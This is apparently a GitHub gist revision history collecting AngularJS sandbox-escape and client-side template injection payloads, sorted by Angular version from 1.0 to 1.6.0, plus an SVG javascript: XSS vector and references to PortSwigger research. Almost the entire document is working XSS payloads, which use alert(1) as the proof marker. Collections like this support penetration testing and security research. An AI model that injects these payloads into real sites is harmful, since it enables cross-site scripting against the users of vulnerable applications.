Last active
September 16, 2025 13:51
-
-
Save mccabe615/cc92daaf368c9f5e15eda371728083a3 to your computer and use it in GitHub Desktop.
Revisions
-
mccabe615 revised this gist
Dec 15, 2016 . 1 changed file with 26 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -112,6 +112,32 @@ SVG </svg> ``` Angular 1.5.9 Jan Horn sandbox escape ``` {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} ``` Angular 1.6.0 ``` <script src="//ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script> {{0[a='constructor'][a]('alert(1)')()}} ``` http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html https://github.com/angular/angular.js/issues/14939 https://github.com/angular/angular.js/pull/11290 -
Sep 23, 2016 . No changes.There are no files selected for viewing
-
Aug 2, 2016 . 1 changed file with 11 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -102,6 +102,16 @@ Versions 1.2.0 - 1.2.5: {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}} ``` SVG ``` <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a> </svg> ``` http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html https://github.com/angular/angular.js/issues/14939 https://github.com/angular/angular.js/pull/11290 -
Jul 25, 2016 . 1 changed file with 27 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -77,5 +77,31 @@ As literal object: `{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join; As Array: `{{x = [''.constructor.prototype]; x[0].charAt=[].join; $eval('x=alert(Evaluated Array)');}}` Versions 1.3.0 - 1.5.7: ``` {{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}} ``` Versions 1.2.20 - 1.2.29: ``` {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}} ``` Version 1.2.19: ``` {{c=toString.constructor;p=c.prototype;p.toString=p.call;["a","alert(1)"].sort(c)}} ``` Versions 1.2.6 - 1.2.18: ``` {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} ``` Versions 1.2.0 - 1.2.5: ``` {{a="a"["constructor"].prototype;a.charAt=a.trim;$eval('a",alert(alert=1),"')}} ``` http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html https://github.com/angular/angular.js/issues/14939 -
Jul 25, 2016 . 1 changed file with 12 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,6 @@ #### 1.3.2 and below `{{7*7}}` @@ -68,4 +69,13 @@ http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` #### 1.3.3 As literal object: `{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(Evaluated Object Literal)');}}` As Array: `{{x = [''.constructor.prototype]; x[0].charAt=[].join; $eval('x=alert(Evaluated Array)');}}` http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html https://github.com/angular/angular.js/issues/14939 -
Jul 21, 2016 . 1 changed file with 8 additions and 8 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -60,12 +60,12 @@ http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html 'alert(1);' )) );}} ``` ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` -
Jul 12, 2016 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,6 @@ http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html `{{7*7}}` ``` -
Jul 12, 2016 . 1 changed file with 4 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -62,4 +62,8 @@ ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` -
Jul 12, 2016 . 1 changed file with 34 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -29,4 +29,37 @@ ``` {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} ``` ``` {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} ``` ``` {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} ``` ``` {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} ``` ``` {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) );}} ``` ``` {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` -
Jul 12, 2016 . 1 changed file with 15 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,11 @@ `{{7*7}}` ``` 'a'.constructor.fromCharCode=[].join; 'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e'; ``` ``` {{ 'a'.constructor.prototype.charAt=[].join; @@ -14,4 +19,14 @@ 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)')+'' }} ``` `{{constructor.constructor('alert(1)')()}}` ``` {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} ``` ``` {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} ``` -
Jul 12, 2016 . 1 changed file with 10 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,14 @@ `{{7*7}}` ``` {{ 'a'.constructor.prototype.charAt=[].join; $eval('x=""')+'' }} ``` ``` {{ 'a'.constructor.prototype.charAt=[].join; -
Jul 12, 2016 . 1 changed file with 2 additions and 2 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,7 +1,7 @@ ``` {{ 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)')+'' }} ``` -
Jul 12, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,7 @@ ` {{ 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)')+'' }} `